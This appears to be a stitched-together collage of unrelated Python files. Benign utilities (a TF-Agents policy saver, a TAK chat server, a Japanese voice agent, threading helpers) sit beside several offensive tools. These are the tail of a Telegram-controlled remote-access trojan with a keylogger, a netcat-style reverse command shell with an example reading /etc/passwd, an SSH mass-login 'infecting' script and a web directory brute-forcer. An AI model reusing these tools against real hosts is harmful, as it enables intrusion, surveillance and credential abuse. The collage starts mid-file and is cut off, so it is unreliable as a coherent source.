'/wallpaper':'<target_file>'}
response = "\n".join(command + ' ' + description for command,description in sorted(functionalities.items()))
else: # redirect to /help
cd.log('w','BOT MISUSE: Invalid command')
msg = {'text' : '/help', 'chat' : { 'id' : chat_id }}
handle(msg)
except Exception as e:
cd.log('e','BOT MISUSE: Unknown error running command or function.')
cd.log('z','Details from previous error'+str(e))
#raise
cd.log('n','Command {} ran'.format(command))
else: # Upload a file to target
file_name = ''
file_id = None
if 'document' in msg:
file_name = msg['document']['file_name']
file_id = msg['document']['file_id']
elif 'photo' in msg:
file_time = int(time.time())
file_id = msg['photo'][1]['file_id']
file_name = file_id + '.jpg'
file_path = bot.getFile(file_id=file_id)['file_path']
link = 'https://api.telegram.org/file/bot' + str(token) + '/' + file_path
file = (requests.get(link, stream=True)).raw
with open(hide_folder + '\\' + file_name, 'wb') as out_file:
copyfileobj(file, out_file)
response = 'File saved as ' + file_name
if response != '':
responses = split_string(4096, response)
for resp in responses:
send_safe_message(bot, chat_id, resp)#
if token == 'xx:xx': cd.log('e','Token has not been set, open up RATAttack.py and change the token - then recompile (if applicable).'); raise Exception('Token not set')
cd.log('s','Setup done')
cd.log('i','Starting')
bot = telepot.Bot(token)
bot.message_loop(handle)
if len(known_ids) > 0:
helloWorld = platform.uname()[1] + ": I'm up."
for known_id in known_ids: send_safe_message(bot, known_id, helloWorld)
print(helloWorld)
cd.log('s','Started')
cd.log('i','Listening for commands on ' + platform.uname()[1] + '...')
hookManager = pyHook.HookManager()
hookManager.KeyDown = pressed_chars
hookManager.HookKeyboard()
pythoncom.PumpMessages()
|
ant.py
|
#!/bin/python3
#
# Arm0red Net Tool
# ant.py
import sys
import socket
import getopt
import threading
import subprocess
# define some global variables
listen = False
command = False
upload = False
execute = ""
target = ""
upload_destination = ""
port = 0
def usage():
print("arm0red Net Tool")
print()
print("Usage: ant.py -t target_host -p port")
print("-l --listen - listen on [host]:[port] for incoming connections")
print("-e --execute=file_to_run - execute the given file upon receiving a connection")
print("-c --command - initialize a command shell")
print("-u --upload=destination - upon receiving connaction upload a file and write to destination")
print()
print()
print("Examples: ")
print("ant.py -l -p 5555 -c")
print("ant.py -t 192.168.1.23 -p 5555 -l -u=c:\\target.exe")
print("arnt.py -t 192.168.1.45 -p 5555 -l -e=\"cat /etc/passwd\"")
print("echo 'ABCDEFGHI' | ./ant.py -t 192.168.1.67 -p 8910")
sys.exit(0)
def client_sender(buffer):
client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
# connect to our target host
client.connect((target,port))
if len(buffer):
client.send(bytes(str(buffer), "UTF-8"))
while True:
# now wait for data back
recv_len = 1
response = ""
while recv_len:
data = client.recv(4096)
recv_len = len(data)
response += data.decode("UTF-8")
if recv_len < 4096:
break
print(response,)
# wait for more input
buffer = input("")
buffer += "\n"
# send it off
client.send(bytes(str(buffer), "UTF-8"))
except Exception as e:
print("[*] Exception! Exiting.")
print(e)
# tear down the connection
client.close()
def server_loop():
global target
# if no target is defined, we listen on all interfaces
if not len(target):
target = "0.0.0.0"
server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server.bind((target,port))
server.listen(5)
while True:
client_socket, addr = server.accept()
# spin off a thread to handle our new client
client_thread = threading.Thread(target=client_handler, args=(client_socket,))
client_thread.start()
def run_command(command):
# trim the newline
command = command.rstrip()
# run the command and get the output back
try:
output = subprocess.check_output(command,stderr=subprocess.STDOUT, shell=True)
except:
output = "Failed to execute command.\r\n"
# send the output back to the client
return output
def client_handler(client_socket):
global upload
global execute
global command
# check for upload
if len(upload_destination):
# read in all of the bytes and write to our destination
file_buffer = ""
# keep reading data until none is available
while True:
data = client_socket.recv(1024)
if not data:
break
else:
file_buffer += data
try:
file_descriptor = open(upload_destination,"wb")
file_descriptor.write(file_buffer)
file_descriptor.close()
# acknowlege that we wrote the file out
client_socket.send(bytes(str("Successfully saved file to %s\r\n" % upload_destination), "UTF-8"))
except:
client_socket.send(bytes(str("Failed to save file to %s\r\n" % upload_destination), "UTF-8"))
# check for command execution
if len(execute):
# run the command
output = run_command(execute)
client_socket.send(bytes(str(output), "UTF-8"))
# now we go into another loop if a command shell was requested
if command:
while True:
# show a simple prompt
client_socket.send(bytes(str("<ANT:#> "), "UTF-8"))
# now we receive until we see a linefeed (enter key)
cmd_buffer = ""
while "\n" not in cmd_buffer:
cmd_buffer += client_socket.recv(1024).decode("UTF-8")
# send back the command output
response = run_command(cmd_buffer)
# send back the response
client_socket.send(bytes(str(response) + "\n", "UTF-8"))
def main():
global listen
global port
global execute
global command
global upload_destination
global target
if not len(sys.argv[1:]):
usage()
# read the command line options
try:
opts, args = getopt.getopt(sys.argv[1:],"hle:t:p:cu:", ["help","listen","execute","target","port","command","upload"])
except getopt.GetoptError as err:
print(str(err))
usage()
for o,a in opts:
if o in ("-h","--help"):
usage()
elif o in ("-l","--listen"):
listen = True
elif o in ("-e","--execute"):
execute = a
elif o in ("-c","--commandshell"):
command = True
elif o in ("-u","--upload"):
upload_destination = a
elif o in ("-t","--target"):
target = a
elif o in ("-p","--port"):
port = int(a)
else:
assert False,"Unhandled Option"
# are we going to listen or just send data from stdin?
if not listen and len(target) and port > 0:
# read in the buffer from the commandline
# this will block, so send CTRL-D if not sending imput
# to stdin
buffer = sys.stdin.read()
# send data off
client_sender(buffer)
# we are going to listen and potentially
# upload things, execute commands, and drop a shell back
# depending on our command line options above
if listen:
server_loop()
main()
|
listen_user.py
|
import abc
from asyncio.queues import QueueEmpty
import json
import os
import threading
import time
import numpy as np
from sentence_transformers import SentenceTransformer
from onnx_sentence_transformers import ONNXSentenceTransformer
import simpleaudio as sa
import speech_recognition as sr
import yaml
from ibm_cloud_sdk_core.authenticators import IAMAuthenticator
from ibm_watson import SpeechToTextV1
from tsukuyomichan_talksoft import TsukuyomichanTalksoft
from bert_agent import EmbeddingBasedReplyAgent
from yamnet import HumanVoiceDetector
import librosa
from espnet_model_zoo.downloader import ModelDownloader
from espnet2.bin.asr_inference import Speech2Text
import random
class TsukuyomichanAgent:
MAX_WAV_VALUE = 32768.0
fs = 24000
def __init__(self):
self.r = sr.Recognizer()
self.speech = sr.Microphone(sample_rate=16000)
self.talksoft = TsukuyomichanTalksoft(model_version='v.1.2.0')
self.voice_detector = HumanVoiceDetector()
use_many_cpu_as_possible = False
if use_many_cpu_as_possible:
self.sentence_transformer = ONNXSentenceTransformer()
else:
# self.sentence_transformer = SentenceTransformer("paraphrase-multilingual-mpnet-base-v2")
self.sentence_transformer = SentenceTransformer("paraphrase-multilingual-MiniLM-L12-v2")
d = ModelDownloader()
aaa = d.download_and_unpack("kan-bayashi/csj_asr_train_asr_transformer_raw_char_sp_valid.acc.ave")
print(aaa)
self.speech2text = Speech2Text(
**aaa,
device="cuda"
)
def speak(self, reply, seed=None):
if seed is None:
seed = random.randint(0,1000)
print(f"Speaking {reply}")
wav = self.talksoft.generate_voice(reply, seed)
wav = wav * self.MAX_WAV_VALUE
wav = wav.astype(np.int16)
play_obj = sa.play_buffer(wav, 1, 2, self.fs)
play_obj.wait_done()
def listen_voice_event(self):
return self.voice_detector.wait_for_human_voice()
def recognize_talk(self, timeout=None):
with self.speech as source:
print("start listening")
audio_file = self.r.adjust_for_ambient_noise(source)
try:
audio_file = self.r.listen(source, timeout=timeout)
except sr.WaitTimeoutError:
return None
print("start recognization")
sentence = self.speech2text(librosa.util.buf_to_float(audio_file.get_wav_data(), n_bytes=2, dtype=np.int16))[0][0]
print(sentence)
return sentence
def wait_for_one_of_in_similar_meaning(self, sentences, timeout=None):
user_talk = self.recognize_talk(timeout)
if not user_talk:
return None
user_embedding = self.sentence_transformer.encode(user_talk)
distances = [np.linalg.norm(user_embedding - self.sentence_transformer.encode(sentence)) for sentence in sentences]
min_index = np.argmin(distances)
MAX_ACCEPTABLE_DISTANCE = 10
if distances[min_index] < MAX_ACCEPTABLE_DISTANCE:
return sentences[min_index]
return None
def speech_to_text(self, wave):
nbests = self.speech2text(wave)
text, *_ = nbests[0]
return text
import inspect
import importlib
import queue
agent = TsukuyomichanAgent()
conversations = []
module = importlib.import_module("conversations.basic_conversations")
for _, obj in inspect.getmembers(module):
if inspect.isclass(obj) and inspect.getmodule(obj) == module:
if abc.ABC not in obj.__bases__:
conversations.append(obj(agent))
queue_obj = queue.Queue()
def get_sound_events():
while True:
event = agent.listen_voice_event()
queue_obj.put_nowait(event)
threading.Thread(target=get_sound_events, daemon=True).start()
while True:
event = None
try:
event = queue_obj.get_nowait()
except queue.Empty:
pass
for conversation in conversations:
if (event is not None and conversation.react_to(event)) or conversation.fire():
conversation.start(event, agent)
break
|
async_policy_saver.py
|
# coding=utf-8
# Copyright 2020 The TF-Agents Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Lint as: python3
"""Async helper for the policy saver."""
import threading
from typing import Text
from absl import logging
from tf_agents.policies import policy_saver as policy_saver_module
class AsyncPolicySaver(object):
"""Triggers `policy_saver` save calls in a separate thread asynchronously."""
def __init__(self, policy_saver: policy_saver_module.PolicySaver):
"""Initialize an AsyncPolicySaver.
Args:
policy_saver: An instance of a `policy_saver.PolicySaver`.
"""
self._policy_saver = policy_saver
self._save_condition_variable = threading.Condition()
# These vars should only be accessed if the lock in save_condition is held.
# export_dir is set to None whenever there is no pending save. Otherwise it
# is used to communicate across threads.
self._export_dir = None
self._saving_checkpoint = False
self._join_save_thread = False
self._save_thread = threading.Thread(target=self._save_loop)
self._save_thread.start()
def _save_loop(self):
"""Helper method for the saving thread to wait and execute save requests."""
while True:
with self._save_condition_variable:
while not self._export_dir:
self._save_condition_variable.wait()
if self._join_save_thread:
return
if self._saving_checkpoint:
logging.info("Saving checkpoint to %s", self._export_dir)
self._policy_saver.save_checkpoint(self._export_dir)
else:
logging.info("Saving policy to %s", self._export_dir)
self._policy_saver.save(self._export_dir)
self._export_dir = None
self._save_condition_variable.notify()
def _assert_save_thread_is_alive(self):
if self._join_save_thread or not self._save_thread.is_alive():
raise ValueError("Saving thread in AsyncPolicySaver is not alive. Either "
"an exception has occured while saving, or the saver "
"was closed.")
def save(self, export_dir: Text, blocking: bool = False):
"""Triggers an async save of the policy to the given `export_dir`.
Only one save can be triggered at a time. If `save` or `save_checkpoint`
are called while another save of either kind is still ongoing the saving is
skipped.
If blocking is set then the call will block until any ongoing saves finish,
and then a new save will be made before returning.
Args:
export_dir: Directory path for the `saved_model` of the policy.
blocking: If True the call to save will block until a save can be
performed and finished. If a save was ongoing it will wait for that to
finish, and then do a blocking save before returning.
"""
self._save(export_dir, saving_checkpoint=False, blocking=blocking)
def save_checkpoint(self, export_dir: Text, blocking: bool = False):
"""Triggers an async save of the policy checkpoint.
Only one save can be triggered at a time. If `save` or `save_checkpoint`
are called while another save of either kind is still ongoing the saving is
skipped.
If blocking is set then the call will block until any ongoing saves finish,
and then a new save will be made before returning.
Args:
export_dir: Directory path for the checkpoint of the policy.
blocking: If True the call to save will block until a save can be
performed and finished. If a save was ongoing it will wait for that to
finish, and then do a blocking save before returning.
"""
self._save(export_dir, saving_checkpoint=True, blocking=blocking)
def _save(self, export_dir, saving_checkpoint, blocking):
"""Helper save method, generalizes over save and save_checkpoint."""
self._assert_save_thread_is_alive()
if blocking:
with self._save_condition_variable:
while self._export_dir:
logging.info("Waiting for AsyncPolicySaver to finish.")
self._save_condition_variable.wait()
if saving_checkpoint:
self._policy_saver.save_checkpoint(export_dir)
else:
self._policy_saver.save(export_dir)
return
if not self._save_condition_variable.acquire(blocking=False):
logging.info("AsyncPolicySaver save is still in progress skipping save.")
return
try:
self._saving_checkpoint = saving_checkpoint
self._export_dir = export_dir
self._save_condition_variable.notify()
finally:
self._save_condition_variable.release()
def flush(self):
"""Blocks until there is no saving happening."""
with self._save_condition_variable:
while self._export_dir:
logging.info("Waiting for AsyncPolicySaver to finish.")
self._save_condition_variable.wait()
def close(self):
"""Blocks until there is no saving happening and kills the save_thread."""
with self._save_condition_variable:
while self._export_dir:
logging.info("Waiting for AsyncPolicySaver to finish.")
self._save_condition_variable.wait()
self._join_save_thread = True
self._save_condition_variable.notify()
self._save_thread.join()
|
server.py
|
#######################################################
#
# TAKFreeServer.py
# Original author: naman108
# This code is Open Source, made available under the EPL 2.0 license.
# https://www.eclipse.org/legal/eplfaq.php
# credit to Harshini73 for base code
#
#######################################################
import argparse
import datetime
import logging
import os
import socket
import sqlite3
import sys
import threading
import time
import traceback
import uuid
import xml.etree.ElementTree as ET
from logging.handlers import RotatingFileHandler
import constants
import SQLcommands
from Controllers.RequestCOTController import RequestCOTController
from Controllers.serializer import Serializer
const = constants.vars()
sql = SQLcommands.sql()
def newHandler(filename, log_level, log_format):
handler = RotatingFileHandler(
filename,
maxBytes=const.MAXFILESIZE,
backupCount=const.BACKUPCOUNT
)
handler.setFormatter(log_format)
handler.setLevel(log_level)
return handler
log_format = logging.Formatter(const.LOGFORMAT)
logger = logging.getLogger(const.LOGNAME)
logger.setLevel(logging.DEBUG)
logger.addHandler(newHandler(const.DEBUGLOG, logging.DEBUG, log_format))
logger.addHandler(newHandler(const.WARNINGLOG, logging.WARNING, log_format))
logger.addHandler(newHandler(const.INFOLOG, logging.INFO, log_format))
console = logging.StreamHandler(sys.stdout)
console.setFormatter(log_format)
console.setLevel(logging.DEBUG)
logger.addHandler(console)
''' Server class '''
class ThreadedServer(object):
def __init__(self, host=const.IP, port=const.PORT):
# change from string
self.host = host
self.port = port
self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
self.sock.bind((self.host, self.port))
self.client_dict = {}
logger.info(f"Server IP: {host}, server port: {port}")
self.emergencyDict = {}
# configure sql database
with sqlite3.connect(const.DATABASE) as db:
cursor = db.cursor()
cursor.execute(sql.CREATEUSERSTABLE)
cursor.close()
db.commit()
self.bandaidUID = ''
def listen(self):
'''
listen for client connections and begin thread if found
'''
threading.Thread(target=self.bandaid, args=(), daemon=True).start()
self.sock.listen(1000)
while True:
try:
client, address = self.sock.accept()
threading.Thread(target=self.listenToClient, args=(client, address), daemon=True).start()
except:
logger.error(traceback.format_exc())
logger.error('Error in listen()')
def bandaid(self):
while True:
try:
start = datetime.datetime.now()
end = start + datetime.timedelta(minutes=const.RENEWTIME)
while datetime.datetime.now() < end:
time.sleep(10)
self.bandaidUID = uuid.uuid1()
mysock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
mysock.connect(('127.0.0.1', const.PORT))
mysock.send(Serializer().serializerRoot(RequestCOTController().ping(eventuid=self.bandaidUID)).encode())
mysock.recv(2048)
mysock.shutdown(socket.SHUT_RDWR)
mysock.close()
logger.info('finished bandaid keepalive')
logger.debug(f"Currently running {len(threading.enumerate())} threads")
except ConnectionRefusedError:
logger.warning("Bandaid listening socket was closed")
except:
logger.error(traceback.format_exc())
logger.error("Error in bandaid()")
def check_xml(self, xml_string, current_id):
'''
check xml type or class
'''
data_value = ''
try:
if xml_string == const.EMPTY_BYTE:
logger.info('client disconnected via empty byte response')
self.client_dict[current_id]['alive'] = 0
logger.info(str(self.client_dict[current_id]['uid'])+' disconnected')
return const.FAIL
elif xml_string == None:
logger.info('client disconnected via none response')
self.client_dict[current_id]['alive'] = 0
logger.info(str(self.client_dict[current_id]['uid'])+' disconnected')
return const.FAIL
tree = ET.fromstring(xml_string)
uid = tree.get('uid')
logger.debug('parsing data uid is ' + str(uid))
cot_type = tree.get('type')
if cot_type == "a-f-G-U-C":
self.client_dict[current_id]['id_data'] = xml_string
elif cot_type == 'b-f-t-a':
destination = tree.find('detail').find('marti').find('dest').attrib['callsign']
connData = self.client_dict[current_id]["id_data"]
for x in self.client_dict:
if self.client_dict[x]["callsign"] == destination:
self.client_dict[x]["main_data"].append(connData)
logger.info('adding conn data to '+str(x))
logger.info(f"Now adding the following connection data: {str(connData)}")
if uid.endswith("9-1-1"):
for x in tree.iter('emergency'):
if x.get('cancel') != 'true':
self.emergencyDict[uid] = xml_string
else:
del self.emergencyDict[uid]
elif uid.endswith(const.PING):
data_value = const.PING
logger.debug(f"Received a ping: {xml_string}")
elif uid.startswith(const.GEOCHAT):
data_value = const.GEOCHAT
logger.debug(f"Received a GeoChat: {xml_string}")
else:
logger.debug(f"Received CoT: {xml_string}")
# adds data to all connected client data list except sending client
for detail in tree.findall('detail'):
marti = detail.find('marti')
if marti != None:
dest = marti.find('dest')
callsign = dest.attrib['callsign']
for client_id in self.client_dict:
if self.client_dict[client_id]['callsign'] == callsign:
self.client_dict[client_id]['main_data'].append(xml_string)
else:
for client_id in self.client_dict:
if client_id != current_id:
self.client_dict[client_id]['main_data'].append(xml_string)
return data_value
except:
logger.error(traceback.format_exc())
logger.error(f"Error in check_xml for: {xml_string}")
def connectionSetup(self, client, address):
db = sqlite3.connect(const.DATABASE)
try:
cursor = db.cursor()
first_run = 1
# Create client dictionary within main dictionary containing arrays for data and chat also other stuff for client initial connection
total_clients_connected = 0
total_clients_connected += 1
id_data = client.recv(const.STARTBUFFER)
logger.debug(f"id_data = {id_data}")
tree = ET.fromstring(id_data)
uid = tree.get('uid')
if uid == self.bandaidUID:
return 'Bandaid'
callsign = tree.find('detail').find('contact').attrib['callsign']
current_id = uuid.uuid1().int
# add identifying information
self.client_dict[current_id] = {
'id_data': id_data,
'main_data': [],
'alive': 1,
'uid': uid,
'client': client,
'callsign': callsign
}
cursor.execute(sql.INSERTNEWUSER, (str(current_id), str(uid), str(callsign)))
cursor.close()
db.commit()
logger.info(f"Client connected, initial information for current_id={current_id}: {self.client_dict[current_id]}")
return str(first_run)+' ? '+str(total_clients_connected)+' ? '+str(id_data)+' ? '+str(current_id)
except:
logger.error(traceback.format_exc())
logger.error('Error in connection setup')
return "error"
finally:
db.close()
def recieveAll(self, client):
try:
total_data = []
while True:
data = client.recv(const.BUFFER)
logger.debug(f"Received {sys.getsizeof(data)} bytes from {client}")
if sys.getsizeof(data) == const.BUFFER+33:
total_data.append(data)
elif sys.getsizeof(data) < const.BUFFER+33:
total_data.append(data)
break
total_data = b''.join(total_data)
return total_data
except:
logger.error(traceback.format_exc())
logger.error(f"Error in recieveAll() from {client}")
return None
def listenToClient(self, client, address):
'''
Function to receive data from the client. this must be long as everything
'''
try:
defaults = self.connectionSetup(client, address)
if defaults == 'error':
client.shutdown(socket.SHUT_RDWR)
client.close()
return
elif defaults == 'Bandaid':
self.sock.shutdown(socket.SHUT_RDWR)
client.close()
return
else:
defaults = defaults.split(' ? ')
logger.debug(defaults)
first_run = int(defaults[0])
id_data = bytes(defaults[2], 'utf-8')
current_id = int(defaults[3])
# main connection loop
while True:
# Receive data
try:
if first_run == 0:
data = self.recieveAll(client)
logger.debug(f"Received data from client: {str(data)}")
working = self.check_xml(data, current_id)
# checking if check_xml detected client disconnect
if working == const.FAIL:
timeoutInfo = Serializer().serializerRoot(RequestCOTController().timeout(
eventhow='h-g-i-g-o',
eventuid=uuid.uuid1(),
linkuid=self.client_dict[current_id]['uid']
))
logger.debug(f"Sending timeout: {timeoutInfo.encode()}")
for client_id in self.client_dict:
if client_id != current_id:
self.client_dict[client_id]['client'].send(timeoutInfo.encode())
uid = self.client_dict[current_id]['uid']
del self.client_dict[current_id]
with sqlite3.connect(const.DATABASE) as db:
cursor = db.cursor()
cursor.execute(sql.DELETEBYUID, (uid,))
cursor.close()
db.commit()
client.shutdown(socket.SHUT_RDWR)
client.close()
return
elif working == const.PING:
logger.debug('Received ping')
elif first_run == 1:
for client_id in self.client_dict:
client = self.client_dict[client_id]['client']
if client != self.client_dict[current_id]['client']:
logger.info('Sending '+str(id_data))
client.send(self.client_dict[current_id]['id_data'])
for client_id in self.client_dict:
data = self.client_dict[client_id]['id_data']
logger.debug('Sending conn data to '+str(client))
client.send(data)
threading.Thread(
target=self.sendClientData,
args=(client, address, current_id),
daemon=True).start()
# just some debug stuff
first_run = 0
except:
logger.error(traceback.format_exc())
logger.error('Error in listenToClient() main loop')
client.close()
return
except Exception as e:
logger.error(traceback.format_exc())
logging.error("Unknown error in listenToClient")
client.close()
def sendClientData(self, client, address, current_id):
try:
while True:
time.sleep(const.DELAY)
for uid in self.emergencyDict:
client.send(self.emergencyDict[uid])
logger.info(f"Emergency activated: {uid}")
if len(self.client_dict[current_id]['main_data']) > 0:
for x in self.client_dict[current_id]['main_data']:
logger.debug(self.client_dict[current_id]['main_data'])
client.send(x)
logger.info('Sent ' + str(x) + ' to ' + str(address))
self.client_dict[current_id]['main_data'].remove(x)
else:
client.send(Serializer().serializerRoot(RequestCOTController().ping(eventuid=uuid.uuid1())).encode())
except:
logger.error(traceback.format_exc())
logger.warning('Error in sendClientData')
finally:
client.close()
def startup():
logger.info('starting windows service')
ThreadedServer(host=const.IP, port=const.PORT).listen()
if __name__ == "__main__":
try:
parser = argparse.ArgumentParser()
parser.add_argument("-p", type=int)
args = parser.parse_args()
port = args.p
except:
ThreadedServer(host='', port=const.PORT).listen()
logger.error(f"Failed to read port number from command arguments, defaulting to {const.PORT}")
port = const.PORT
ThreadedServer(host=const.IP, port=port).listen()
|
w.py
|
#!/usr/bin/python
import sys, re, os, paramiko
from multiprocessing import Process
if len(sys.argv) < 2:
sys.exit("\033[37mUsage: python "+sys.argv[0]+" [vuln list]")
paramiko.util.log_to_file("/dev/null")
cmd=""
r34d = open(str(sys.argv[1]),'a+')
print "\033[31mStarting Scan!\n"
def w0rk(username,password,ip):
try:
port = 22
ssh = paramiko.SSHClient()
ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
ssh.connect(ip, port = port, username=username, password=password, timeout=3)
print "\033[32m[\033[31m+\033[32m] Infecting:\x1b[31m "+ip+"\x1b[31m\n"
ssh.exec_command(""+cmd+"")
ssh.close()
except:
pass
for line in r34d:
ip_1nfo = line.split(":")
g0d = Process(target=w0rk, args=(ip_1nfo[0],ip_1nfo[1],ip_1nfo[2],))
g0d.start()
username=ip_1nfo[0]
password=ip_1nfo[1]
ip=ip_1nfo[2]
g0d.join()
|
interval_runner.py
|
import threading
from threading import Thread, Event
from typing import Callable
class IntervalRunner:
event: Event
thread: Thread
def __init__(self, target: Callable[[], None], interval_seconds: float = 0.1):
self.event = threading.Event()
self.target = target
self.interval_seconds = interval_seconds
self.thread = threading.Thread(target=self._run)
self.thread.daemon = True
def _run(self) -> None:
while not self.event.is_set():
self.target()
self.event.wait(self.interval_seconds)
def start(self) -> "IntervalRunner":
self.thread.start()
return self
def is_alive(self) -> bool:
return self.thread is not None and self.thread.is_alive()
def shutdown(self):
if self.thread.is_alive():
self.event.set()
self.thread.join()
self.thread = None
|
utils.py
|
def secureErase(file, passes, securityLevel):
import random
import os
import sys
FileNameLength = 50
charList = list('abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890-=[];,./!@#$%^&*(){}|_+<>?')
# Check if the file exists
if not os.path.exists(file):
sys.exit(str(file) + " does not exist")
# Run the amount of passes
for i in range(0, passes):
# Open file
with open(file, 'r', encoding="utf8", errors='ignore') as f:
fileData = f.read().splitlines()
# Wipe current data in file
with open(file, 'w') as f:
f.write('')
# Getdata and prepare to write to the file
for line in fileData:
writeString = ''
# Get length of line and create a string with that length
for write in range(0, len(line) * securityLevel):
writeString += str(charList[random.randint(0, len(charList) - 1)])
# Write string to file
try:
with open(file, 'a') as f:
f.write(str(writeString) + '\n')
except:
pass
# Remove scrambled file
os.remove(file)
def selectScreen():
import os
import PySimpleGUI as sg
sg.theme("DarkBlue")
layout = [
[sg.Text("USB Locker v1.5", font=("Arial", 25))],
[sg.Text("Select a drive from the list below and press 'Lock Drive'", size=(49, 1)),
sg.Button("Refresh List", size=(13, 1))],
[sg.Listbox(scanDrives(), size=(71, 10), key="driveList")],
[sg.Text("Password:"), sg.InputText(size=(62, 1), key="passwordInput")],
[sg.Button("Lock Drive", size=(27, 1)), sg.Button("Unlock Drive", size=(27, 1)), sg.Button("Close")],
[sg.Text("Creaded by: @IWick | https://github.com/iwickgames/", justification="center", size=(65, 1))]
]
window = sg.Window("USB Locker - Select a USB to lock", layout=layout)
while True:
event, values = window.read()
if event == sg.WINDOW_CLOSED or event == "Close":
return "Exit", None, None
if event == "Refresh List":
window["driveList"].Update(scanDrives())
if event == "Lock Drive":
if not values["driveList"]:
sg.popup_error("You must select a drive to lock")
elif not values["passwordInput"]:
sg.popup_error("You must put in a password")
elif os.path.exists(values["driveList"][0] + "usblock.usbpass"):
sg.popup_error("This drive is already locked")
else:
window.close()
return "lock", values["driveList"][0], values["passwordInput"]
if event == "Unlock Drive":
if not values["driveList"]:
sg.popup_error("You must select a drive to unlock")
elif not values["passwordInput"]:
sg.popup_error("You must put in a password")
elif not os.path.exists(values["driveList"][0] + "usblock.usbpass"):
sg.popup_error("This drive is not locked")
else:
window.close()
return "unlock", values["driveList"][0], values["passwordInput"]
def scanDrives():
import os
drives = []
for div in list("ABDEFGHIJKLMNOPQRSTUVWSYZ"):
if os.path.exists(f"{div}:/"):
drives.append(f"{div}:/")
return drives
def dirAllFP(path):
import os
filesList = []
for dirpath, subdirs, files in os.walk(path):
for x in files:
filesList.append(os.path.join(dirpath, x))
return filesList
def lockDrive(drive, password):
import os
import hashlib
import threading
import pyAesCrypt
import PySimpleGUI as sg
def file_encryption(file, fileName, password):
try:
pyAesCrypt.encryptFile(file, fileName, password, 64 * 1024)
os.remove(file)
#secureErase(file, 2, 2)
except:
pass
indexDrive = dirAllFP(drive)
sg.theme("DarkBlue")
layout = [
[sg.Text("Locking Drive " + drive, font=("Arial", 20))],
[sg.ProgressBar(len(indexDrive), orientation="h", size=(50, 20), key="progressBar")]
]
window = sg.Window("Locking drive", layout=layout)
fileLocateion = 0
for file in indexDrive:
fileName = file + ".usblock"
encryption = threading.Thread(target=file_encryption, args=(file, fileName, password))
encryption.start()
while encryption.is_alive():
event, values = window.read(timeout=0)
if event == sg.WINDOW_CLOSED:
window.close()
window["progressBar"].update_bar(fileLocateion)
fileLocateion += 1
window["progressBar"].update_bar(fileLocateion)
with open(drive + "usblock.usbpass", "w") as f:
f.write(hashlib.sha256(password.encode("utf-8")).hexdigest())
sg.popup("Drive " + drive + " was successfully locked")
window.close()
def unlockDrive(drive, password):
import os
import hashlib
import threading
import pyAesCrypt
import PySimpleGUI as sg
def unlock_drive(file, fileName, password):
try:
pyAesCrypt.decryptFile(file, fileName, password, 64 * 1024)
os.remove(file)
except:
pass
indexDrive = dirAllFP(drive)
sg.theme("DarkBlue")
layout = [
[sg.Text("Unlocking Drive " + drive, font=("Arial", 20))],
[sg.ProgressBar(len(indexDrive), orientation="h", size=(50, 20), key="progressBar")]
]
window = sg.Window("Unlocking drive", layout=layout)
with open(drive + "usblock.usbpass") as f:
if not hashlib.sha256(password.encode("utf-8")).hexdigest() == f.read():
return "IncorrectPassword"
fileLocation = 0
for file in indexDrive:
fileName = file.replace(".usblock", "")
decrypt = threading.Thread(target=unlock_drive, args=(file, fileName, password))
decrypt.start()
while decrypt.is_alive():
event, values = window.read(timeout=0)
if event == sg.WINDOW_CLOSED:
window.close()
window["progressBar"].update_bar(fileLocation)
fileLocation += 1
window["progressBar"].update_bar(fileLocation)
os.remove(drive + "usblock.usbpass")
sg.popup("Drive " + drive + " was successfully unlocked")
window.close()
|
multiprocessing_namespaces.py
|
# Copyright (c) 2009 Doug Hellmann All rights reserved.
#
"""
"""
# end_pymotw_header
import multiprocessing
def producer(ns, event):
ns.value = "This is the value"
event.set()
def consumer(ns, event):
try:
print("Before event: {}".format(ns.value))
except Exception as err:
print("Before event, error:", str(err))
event.wait()
print("After event:", ns.value)
if __name__ == "__main__":
mgr = multiprocessing.Manager()
namespace = mgr.Namespace()
event = multiprocessing.Event()
p = multiprocessing.Process(target=producer, args=(namespace, event))
c = multiprocessing.Process(target=consumer, args=(namespace, event))
c.start()
p.start()
c.join()
p.join()
|
timer.py
|
from threading import Thread
class Timer:
def __init__(self, config, bus):
self.bus = bus
bus.register('tick')
self.sleep = config['sleep']
self.thread = Thread(target=self.run)
def start(self):
self.thread.start()
def join(self, timeout=None):
self.thread.join(timeout=timeout)
def run(self):
while self.bus.is_alive():
self.bus.publish('tick', None)
self.bus.sleep(self.sleep)
def request_stop(self):
self.bus.shutdown()
|
DirForcer.py
|
#!/usr/bin/env python3
import argparse
import queue
import sys
import threading
import urllib.error
import urllib.parse
import urllib.request
sys.exit("Use the -h parameter to learn about using the program.") if len(sys.argv[1:]) == 0 else True
description = "DirForcer is a brute-forcing tool designed to brute force an URL " \
"and get a list of accessible directories from it."
parser = argparse.ArgumentParser(description=description)
parser.add_argument("-t", "--target", type=str, help="Target URL")
parser.add_argument("-w", "--wordlist", type=str, help="Path to the wordlist.")
parser.add_argument("-e", "--extension", help="An extension list to use while brute forcing. OPTIONAL "
"default: [ .php , .bak .orig, .inc ]",
action="store_true")
args = parser.parse_args()
thread_count = 25
target_url = args.target
wordlist = args.wordlist
extensions = [".php", ".bak", ".orig", ".inc"]
if args.extension:
extensions = args.extension
resume = None
user_agent = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36"
# Open the wordlist and read each word from it. Put the words in the wordlist into a queue (words_queue)
def build_wordlist(wordlist_file):
try:
file = open(wordlist_file, "r")
except OSError:
sys.exit("Wordlist not found in the location. Are you in the same directory as it?")
raw_words = file.readlines()
file.close()
found_resume = False
words_queue = queue.Queue()
